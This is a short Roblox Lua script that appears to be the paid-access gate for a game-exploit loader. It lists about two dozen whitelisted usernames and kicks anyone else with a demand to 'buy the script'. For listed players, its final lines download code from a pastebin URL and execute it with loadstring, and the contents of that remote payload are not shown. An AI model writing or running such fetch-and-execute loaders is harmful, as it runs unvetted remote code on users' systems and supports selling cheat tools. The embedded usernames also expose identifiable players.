-- Whitelist script content
local whitelist = {
["test"] = true,
["BruhCash4Me"] = true,
["SubtoxivixYT"] = true,
["noaking1245"] = true,
["reenrop123"] = true,
["SaitamaDgold"] = true,
["M8_k3r"] = true,
["mohamrd5566"] = true,
["Smg_434"] = true,
["yunar55"] = true,
["expade1"] = true,
["1wpeiqr"] = true,
["Kenvang54"] = true,
["noobieeee121"] = true,
["muradjan1"] = true,
["catalinz44"] = true,
["antflixx1"] = true,
["Hunterkiller2425"] = true,
["David240710"] = true,
["mikey12th123"] = true,
["EJGAMINGGGXXXDYT"] = true,
["vincentthemazeoflege"] = true,
["KimberlyBranch5"] = true,
  -- Add more whitelisted players here
}

local function isWhitelisted(player)
  return whitelist[player.Name] == true
end

local player = game.Players.LocalPlayer
if not isWhitelisted(player) then
  player:Kick("You are not whitelisted. Please buy the script!")
else
  print("Welcome, " .. player.Name .. "!")
loadstring(game:HttpGet("https://pastebin.com/raw/1sdNAmkM"))()
end
